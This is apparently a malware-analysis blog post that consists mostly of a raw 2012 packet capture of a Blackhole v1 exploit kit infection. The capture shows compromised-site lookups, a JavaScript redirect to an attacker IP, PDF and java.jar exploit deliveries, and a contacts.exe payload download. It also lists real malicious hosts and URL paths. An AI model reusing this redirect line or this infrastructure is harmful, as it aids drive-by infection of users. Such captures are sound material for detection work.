Blackhole v1 Exploit Kit – Tries PDF but Exploits Vulnerable Java

By | June 19, 2015

2012-09-18 22:41:41.081678 IP 192.168.106.131.1325 > 192.168.106.2.53: 35602+ A? arksylhet[.]com. (31)
E..;)………j…j..-.5.’.`………… arksylhet[.]com…..
2012-09-18 22:41:41.212429 IP 192.168.106.2.53 > 192.168.106.131.1325: 35602 1/0/0 A 216.246.98.78 (47)
E..K_……3..j…j..5.-.7………….. arksylhet[.]com……………….bN
2012-09-18 22:41:41.214138 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [S], seq 56424381, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0).@…jk..j…bN…P.\……p… ………..
2012-09-18 22:41:41.417038 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [S.], seq 816984929, ack 56424382, win 64240, options [mss 1460], length 0
E..,_…..t…bN..j..P..0.3a.\..`………..
2012-09-18 22:41:41.417133 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [.], ack 1, win 64240, length 0
E..().@…jr..j…bN…P.\..0.3bP….r..
2012-09-18 22:41:41.418016 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [P.], seq 1:389, ack 1, win 64240, length 388
E…).@…h…j…bN…P.\..0.3bP….8..GET /A67iD4eo/index.html HTTP/1.1
Host: arksylhet[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

2012-09-18 22:41:41.418106 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [.], ack 389, win 64240, length 0
E..(_…..t…bN..j..P..0.3b.\.BP…….
2012-09-18 22:41:41.644235 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [P.], seq 1:509, ack 389, win 64240, length 508
E..$_…..r…bN..j..P..0.3b.\.BP…….HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:53 GMT
Server: Apache
Last-Modified: Tue, 18 Sep 2012 15:53:47 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

………….
.0.E……2H……B……&5.!.._ol….=p…*..6…..rs.wE.,s
!…….^..&……….i.”…..7>.$F’……xw..W…..Q.qi!….\.. i0a….~P..i…V.,#.z2:..@H%.8.K\……1(e……6_…m.3B….v5.V…
2012-09-18 22:41:41.657446 IP 192.168.106.131.1325 > 192.168.106.2.53: 18706+ A? ankaradellservisi[.]com. (39)
E..C)………j…j..-.5./..I…………ankaradellservisi[.]com…..
2012-09-18 22:41:41.744240 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [P.], seq 1:509, ack 389, win 64240, length 508
E..$_…..r…bN..j..P..0.3b.\.BP…….HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:53 GMT
Server: Apache
Last-Modified: Tue, 18 Sep 2012 15:53:47 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
2012-09-18 22:41:41.915330 IP 192.168.106.131.1410 > 89.106.12.145.80: Flags [P.], seq 1:383, ack 1, win 64240, length 382
E…*.@…>…j.Yj…..P..V.y.N.P…….GET /78gcm6uH/js.js HTTP/1.1
Host: ankaradellservisi[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html

2012-09-18 22:41:41.915419 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [.], ack 383, win 64240, length 0
E..(_…..J.Yj….j..P..y.N…X8P…_…
2012-09-18 22:41:42.000482 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [S.], seq 1489918110, ack 928996081, win 64240, options [mss 1460], length 0
E..,_…….\+lF..j..P..X.X.7_Z.`…_…….
2012-09-18 22:41:42.000671 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [.], ack 1, win 64240, length 0
E..(*.@….#..j.\+lF…P7_Z.X.X.P…w…
2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394
E…*.@…….j.\+lF…P7_Z.X.X.P….?..GET /Lk1SsGQm/js.js HTTP/1.1
Host: web63.server77.publicompserver.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html

2012-09-18 22:41:42.001159 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [.], ack 395, win 64240, length 0
E..(_…….\+lF..j..P..X.X.7_\{P…v+..
2012-09-18 22:41:42.067301 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [P.], seq 1:338, ack 383, win 64240, length 337
E..y_…..H.Yj….j..P..y.N…X8P…uW..HTTP/1.1 200 OK
Content-Length: 71
Content-Type: application/x-javascript
Last-Modified: Tue, 18 Sep 2012 15:27:56 GMT
Accept-Ranges: bytes
ETag: “56c7ca2db295cd1:143d0e”
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 19 Sep 2012 01:39:40 GMT
2012-09-18 22:41:42.074803 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [P.], seq 389:739, ack 509, win 63732, length 350
E…*.@…h…j…bN…P.\.B0.5^P….p..GET /favicon.ico HTTP/1.1
Host: arksylhet[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

2012-09-18 22:41:42.074927 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [.], ack 739, win 64240, length 0
E..(_…..t…bN..j..P..0.5^.\..P…….
2012-09-18 22:41:42.075596 IP 192.168.106.131.1413 > 69.194.193.34.80: Flags [S], seq 2894491348, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0* @…….j.E..”…P..n…..p…4………..
2012-09-18 22:41:42.119368 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [P.], seq 1:473, ack 396, win 64239, length 472
E…_…….\+lF..j..P..X.X.7_\|P…D…HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 19 Sep 2012 02:31:59 GMT
ETag: “894002-47-4ca04cfa1a5c0”
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

document.location=’http://69.194.193.34/links/systems-links_warns.php’;
2012-09-18 22:41:42.119620 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [R.], seq 396, ack 473, win 0, length 0
E..(*”@…….j.\+lF…P7_\|X.ZwP…o?..
2012-09-18 22:41:42.121447 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..iy.y….j..P…….~..`………..
2012-09-18 22:41:42.167256 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [P.], seq 1:338, ack 383, win 64240, length 337
E..y_…..H.Yj….j..P..y.N…X8P…uW..HTTP/1.1 200 OK
Content-Length: 71
Content-Type: application/x-javascript
Last-Modified: Tue, 18 Sep 2012 15:27:56 GMT
Accept-Ranges: bytes
ETag: “56c7ca2db295cd1:143d0e”
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 19 Sep 2012 01:39:40 GMT
2012-09-18 22:41:43.962836 IP 192.168.106.131.1414 > 69.194.193.34.80: Flags [P.], seq 1:540, ack 1, win 64240, length 539
E..C*@@….d..j.E..”…P.=1.v…P…J:..GET /links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07 HTTP/1.1
Host: 69.194.193.34
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://69.194.193.34/links/systems-links_warns.php

2012-09-18 22:41:43.962905 IP 69.194.193.34.80 > 192.168.106.131.1414: Flags [.], ack 540, win 64240, length 0
E..(_…….E..”..j..P..v….=4.P…….
2012-09-18 22:41:44.025303 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..iE.y….j..P…….~..`………..
2012-09-18 22:41:44.038294 IP 69.194.193.34.80 > 192.168.106.131.1413: Flags [P.], seq 27793:27798, ack 450, win 64240, length 5
E..-_…….E..”..j..P..X..&..p.P…0|..0

2012-09-18 22:41:44.038792 IP 192.168.106.131.1413 > 69.194.193.34.80: Flags [.], ack 27798, win 63083, length 0
E..(*A@….~..j.E..”…P..p.X..+P..ky#..
2012-09-18 22:41:44.125304 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..iC.y….j..P…….~..`………..
2012-09-18 22:41:44.225321 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..iB.y….j..P…….~..`………..
2012-09-18 22:41:44.325368 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..iA.y….j..P…….~..`………..
2012-09-18 22:41:44.425376 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..i@.y….j..P…….~..`………..
2012-09-18 22:41:44.472722 IP 69.194.193.34.80 > 192.168.106.131.1414: Flags [P.], seq 1:1261, ack 540, win 64240, length 1260
E…_…….E..”..j..P..v….=4.P…?o..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:41:57 GMT
Content-Type: application/pdf
Connection: keep-alive
Content-Length: 18637
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Accept-Ranges: bytes
Content-Disposition: inline; filename=ef177.pdf
E..,`…..i .y….j..P…….~..`………..
2012-09-18 22:41:45.860721 IP 192.168.106.131.1413 > 69.194.193.34.80: Flags [P.], seq 450:800, ack 27798, win 63083, length 350
E…*O@…….j.E..”…P..p.X..+P..k.1..GET /favicon.ico HTTP/1.1
Host: 69.194.193.34
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

2012-09-18 22:41:45.860850 IP 69.194.193.34.80 > 192.168.106.131.1413: Flags [.], ack 800, win 64240, length 0
E..(`…….E..”..j..P..X..+..q.P…s@..
2012-09-18 22:41:45.898507 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [P.], seq 739:1119, ack 1037, win 63204, length 380
E…*R@…h…j…bN…P.\..0.7nP…,…GET /favicon.ico HTTP/1.1
Host: arksylhet[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
2012-09-18 22:41:47.553965 IP 192.168.106.131.1415 > 69.194.193.34.80: Flags [P.], seq 1:274, ack 1, win 64240, length 273
E..9*a@….M..j.E..”…P.?.GA.*.P…….GET /data/java.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06
Host: 69.194.193.34
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2012-09-18 22:41:47.554073 IP 69.194.193.34.80 > 192.168.106.131.1415: Flags [.], ack 274, win 64240, length 0
E..(`…….E..”..j..P..A.*..?.XP….G..
2012-09-18 22:41:47.626406 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`…..i..y….j..P…….~..`………..
2012-09-18 22:41:47.726486 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`…..i..y….j..P…….~..`………..
2012-09-18 22:41:47.826428 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,` ….i..y….j..P…….~..`………..
2012-09-18 22:41:47.926477 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`!….i..y….j..P…….~..`………..
2012-09-18 22:41:48.026539 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`”….h..y….j..P…….~..`………..
2012-09-18 22:41:48.092307 IP 69.194.193.34.80 > 192.168.106.131.1415: Flags [P.], seq 1:234, ack 274, win 64240, length 233
E…`#……E..”..j..P..A.*..?.XP…;3..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:42:01 GMT
Content-Type: application/java-archive
Connection: keep-alive
Content-Length: 33010
Last-Modified: Tue, 18 Sep 2012 07:17:22 GMT
Accept-Ranges: bytes
2012-09-18 22:41:51.821007 IP 192.168.106.131.1416 > 69.194.193.34.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263
E../*w@….A..j.E..”…P.<..`dv.P…a…GET /links/systems-links_warns.php?vf=0206360203&we=35353306040934370b06&r=02&pj=w&gc=r HTTP/1.1 User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06 Host: 69.194.193.34 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive

2012-09-18 22:41:51.821113 IP 69.194.193.34.80 > 192.168.106.131.1416: Flags [.], ack 264, win 64240, length 0

E..(`l…..SE..”..j..P..`dv.. 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`m….h..y….j..P…….~..`………..
2012-09-18 22:41:51.926647 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`n….h..y….j..P…….~..`………..
2012-09-18 22:41:52.026635 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`o….h..y….j..P…….~..`………..
2012-09-18 22:41:52.126650 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`p….h..y….j..P…….~..`………..
2012-09-18 22:41:52.226674 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`q….h..y….j..P…….~..`………..
2012-09-18 22:41:52.326590 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`r….h..y….j..P…….~..`………..
2012-09-18 22:41:52.369258 IP 69.194.193.34.80 > 192.168.106.131.1416: Flags [P.], seq 1:1461, ack 264, win 64240, length 1460
E…`s……E..”..j..P..`dv..<..P…….HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:42:05 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 131584
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Pragma: public
Expires: Wed, 19 Sep 2012 02:42:04 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename=”contacts.exe”
Content-Transfer-Encoding: binary

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

Share Button

One thought on “Blackhole v1 Exploit Kit – Tries PDF but Exploits Vulnerable Java

  1. Pingback: Margaret Cunniffe and David Brown are Australian Fraudsters based in Melbourne Victoria that deceive real business people via Synergize Vip Vip Club and Connect Network Fundraise but are nothing more than con-artists.

Leave a Reply

Your email address will not be published. Required fields are marked *